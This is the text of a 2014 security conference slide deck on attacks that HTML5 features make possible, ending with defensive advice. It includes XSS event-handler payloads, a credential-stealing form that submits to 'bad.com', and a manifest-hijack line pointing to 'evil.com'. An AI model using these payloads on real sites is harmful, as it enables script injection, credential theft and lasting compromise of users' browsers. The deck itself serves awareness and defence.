Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 1 1/29/2014 Deny All © 2013 1
HTML5
a clear & present danger
Renaud Bidou
CTO
Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 2 1/29/2014 Deny All © 2013 2
Menu
1. HTML5 new capabilities
2. HTML5 tricks
3. Empowering common threats
4. Hackers’dreams come true
Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 3 1/29/2014 Deny All © 2013 3 Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 3
What’s new with HTML5
Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 4 1/29/2014 Deny All © 2013 4
• Project led by W3C
• Latest draft: HTML 5.1 – May 2, 2013 – Previous : December 17, 2012
– Previously : 13 drafts starting from January 22, 2008
• Why HTML5 ? – Make HTML content natively dynamic
– Support offline mode
– Increase security control and tuning
– Improve internals for performance, task parallelization etc.
HTML5 short history
Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 5 1/29/2014 Deny All © 2013 5
• On-the-fly graphics with the <canvas> tag
• Native MP3, Ogg and Wav audio format support with the <audio> tag
• Native MP4, WebM and Ogg video format support with the <video> tag
• Drag & Drop ! with draggable attribute and
ondrop event handler
• Embedded geolocation with the new getCurrentPosition() method
New HTML content
Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 6 1/29/2014 Deny All © 2013 6
• New input types through <input type> attribute
– Email : type="email"
– URL: type="url"
– Numbers: type="number" type="range"
– Date: type="date" type="month" type="week"
• Embedded format validator
– Based on type attribute value
– Can be enforced through the pattern attribute
– Can be disabled… don’t try to understand…
Input Validation
<form novalidate>
Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 7 1/29/2014 Deny All © 2013 7
New forms inputs
<input type="email">
<input type="url">
<input pattern="d{4}"
placeholder="4 digits PIN">
<input type="number" min="0"
max="10" step="2" value="6">
Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 8 1/29/2014 Deny All © 2013 8
• Web Workers enable JavaScript background
processing
• Web Storage improves local storage to
extend the cookie concept and natively
support session-based data handling
• WebApp Cache to enable offline mode of
Web/Cloud based applications
• Server Sent Events (SSE) enables Server to
Client communication through the
established connection
New HTML internals
Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 9 1/29/2014 Deny All © 2013 9 Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 9
HTML5 new security tricks
Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 10 1/29/2014 Deny All © 2013 10
• iFrames sandboxing
– forbids forms, scripts, popups, access to cookies,
local storage
– considers the content being provided by another
domain
• iFrame sandboxes are not set by default
– Backward compatibility
– sandbox attribute to be explicitly set without value
iFrame Sandboxing
<iframe src="iframe-source.html" sandbox="">
Not natural at all
Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 11 1/29/2014 Deny All © 2013 11
• Cross-document messaging
– provides mechanism for iframes to communicate with
parent document
– overrides HTML4 restrictions
• Implementation failure
– Parent frame to control sources of messages
– Rarely (never) performed
– Origin iframe identification not even enforced
Cross-document messaging
window.parent.postMessage('hello', '*'); Origin iFrame ID
Wildcards are valid
& Recommended
Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 12 1/29/2014 Deny All © 2013 12
• Sandboxes are not applied
– iFrames provide access to local storage
– iFrames allows script execution and forms
• Thanks to cross-document messaging
– iFrames communicate with parent window
iFrame insecurity
HTML5 opens doors between iframes and parents
Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 13 1/29/2014 Deny All © 2013 13
• Cross-Origin Resource Sharing
• Required for « modern » applications
• Browsers to handle 3rd party domains content handling
CORS
1 2
Site A Site B
Main page
Request for 3rd party content
HTML5 powered browser
Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 14 1/29/2014 Deny All © 2013 14
CORS tricky concept
• CORS « security » controls
1 2
Site A Site B GET / HTTP/1.1
Host: Site_A
HTTP/1.1 200 OK
GET /content.htm HTTP/1.1
Host: Site_B
Origin: http://Site_A
HTTP/1.1 200 OK
Access-Control-Allow-Origin: http://Site_A
• rely on
– Origin and Access-Control-Allow-Origin headers
– Relevant access control implemented on server
– Client Server trust relationship
??????????????
Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 15 1/29/2014 Deny All © 2013 15
• Access control
– No implementation standard
– Often set as site-level through includes or left universal
• Preflighted requests
– Inform about supported methods
– Define security policy set on browser
– Responses are cached on client
CORS Security Issues
Access-Control-Allow-Origin: *
No reliable access control on server
Browsers will not update their security policy
Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 16 1/29/2014 Deny All © 2013 16
1. CORS obsoletes SOP
The Gig
« Native » browsing on internal networks
Powerful DoS capabilities
Accurate network (IP, port) scan behind the firewall
Etc.
2. iFrames are out of control
Browsers are turned into proxies
Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 17 1/29/2014 Deny All © 2013 17 Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 17
Empowering usual attacks
Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 18 1/29/2014 Deny All © 2013 18
• 31 HTML5 new tags
– 31 new injections vectors supported by browsers
• 52 + 1 HTML5 new script event handlers
– 52 on* injection points
+ formaction : will bypass on\w+= like filters
Injections heaven
<audio> <canvas> <command> <embed> <nav> <param> <source>
<ruby> <track> <video> …
<form id="test" />
<button form="test" formaction="javascript:alert(1)">
Thousands of new evasion combinations
Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 19 1/29/2014 Deny All © 2013 19
• Self-triggering execution through autofocus
Attributes you will love
<input type="text" value="" onfocus="alert(1)" autofocus>
<body onscroll=alert(1)>
<br><br><br><br><br><br>...<br><br><br>
<input autofocus>
<form action="" method="post">
<input name="username" value="admin" />
<input name="password" type="password" value="secret" />
<input name="captcha" value="" dirname="password"/>
<input type="submit">
</form>
• Overwrite userinput with dirname
username=admin&password=ltr&captcha=
Stealth user abuses
– Can be efficiently combined with appropriate handlers
Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 20 1/29/2014 Deny All © 2013 20
• Abusing the D&D API
– Have a user drag & drop something
• Image, text, browser element (scrollbar, slider etc.)
– Set the value of dragged element to whatever you want
• Malicious data to be submitted on behalf of the user
• Confidential data to be stolen
– Have an invisible element follow the mouse
– Set the ondrop event handler of the iFrame to whatever …
• Feed form content (with malicious data) : CSRF
• Send content (stolen data) to 3rd party : Cross-domain data leak
Drag&Drop Jacking
Bypasses cross-domain & CSRF protections
Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 21 1/29/2014 Deny All © 2013 21
• External forms content definition
– Thanks to the form & formaction attributes
– Can also be used to bypass CSRF protections
– Not that subtile, but still smarter than average users…
S’more Clickjacking
<form id='auth' action='/login'>
<input type='text' placeholder='login'>
<br><input type='password' placeholder='password'>
<br><input type='submit' value='Enter‘>
</form>
<input form='auth' type='submit' value='Enter HERE'
formaction='http://bad.com/thanks' >
Trivial data theft & CSRF protections bypass
Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 22 1/29/2014 Deny All © 2013 22
• Screenshots with XSS
– Thanks to <canvas> tag…
XSS Unleashed
5. Hacker retrieves screenshot
2. Malicious Javascript is loaded on Victim
4. Victim sends screenshot
3. Victim executes Javascript
1. Hacker exploits XSS vulnerability
Hacker
Vulnerable App Victim Browser
Relay
Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 23 1/29/2014 Deny All © 2013 23
• Bi-directional communication channel – Server-Side Events to change web-based botnets behaviour
• Past : – Agent regularly connect to C&C channel :
• to get commands and provide output
• « Easy » to identify and sign
– Threat is in out • Efficiently addressed with outgoing proxies
• Now: – No recurring connections to C&C channel
• Commands sent by server / responses sent asynchronously
• No standard behaviour to modelize
– Threat is out in • Not addressed by web client security devices
BotnetNG
Botnet prevention mechanisms are obsolete
Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 24 1/29/2014 Deny All © 2013 24 Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 24
HTML5 Inside
Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 25 1/29/2014 Deny All © 2013 25
• A botnet case study – Targets clients connected to compromised application
– Used to crack passwords
• Takes advantage of Web Workers – Browsers compute hashes in the background
– Invisible to user, no impact on browser performances
• Just theory ? – Ravan, Distributed JS Computing Systems
– Supports MD5 and SHA hashes
– Simply a PoC, user are asked for permission
Password cracking
Web hackers’ version of distributed computing
Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 26 1/29/2014 Deny All © 2013 26
• Issues with injections – Volatile: limited timeframe
– Persistent: can be removed from compromised DB
• The Hacker’s dream – Persistent injections for unlimited timeframe
– Client-side persistency to prevent one-shot removal
• WebApp cache: HTML5 gift to the underground – local HTML5 storage
– Independant from browser cache
• Not so easy to clean, whenever possible
– Prevents any request from the client
– Allow to cache anything, including the root of the application
Dream comes True
Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 27 1/29/2014 Deny All © 2013 27
• Browser requests a page
WebApp Cache
GET / HTTP/1.1
<!DOCTYPE HTML>
<html manifest="site.appcache">
…
<html> Manifest file URL
• Browser gets the Manifest file
– Specifies pages to be locally cached
– Some more stuff
• Browser stores the files
– Never to be requested again
Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 28 1/29/2014 Deny All © 2013 28
• One Scenario
– Exploit a client-side injection vulnerability on a server (XSS)
• Can be volatile, will be used just once
– Have the client browser execute something like
The Ultimate APT
document.getElementsByTagName("html")[0]\
.setAttribute("manifest","http://evil.com/bad.manifest");
Changes the manifest attribute to
– Set an entry in the corrupted manifest file to a corrupted file
• with « alternate » capabilties such as fishing or drive-by download
Client access to application compromised forever
Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 29 1/29/2014 Deny All © 2013 29 Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 29
Conclusion
Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 30 1/29/2014 Deny All © 2013 30
HTML5 opens doors between iframes and parents
Browsers are turned into proxies
Thousands of new evasion combinations
Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 31 1/29/2014 Deny All © 2013 31
• Identify new HTML5 content – Tags, attributes, event handlers
• Identify previoulsy defined HTML5 content – Now removed from recent drafts
– Still supported by browsers
• Evaluate suspicious combinations – Tag name + attribute + event handler
• Efficiently identify script injections – Don’t try to understand (you can’t)
– Identify the nature of data submitted to your application
• Enforce access restrictions – In the core of applications for Cross-Document Messaging
– At the server level for CORS security
Preventing HTML5 abuses
Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 32 1/29/2014 Deny All © 2013 32
Thank you!
+33 1 46 20 96 00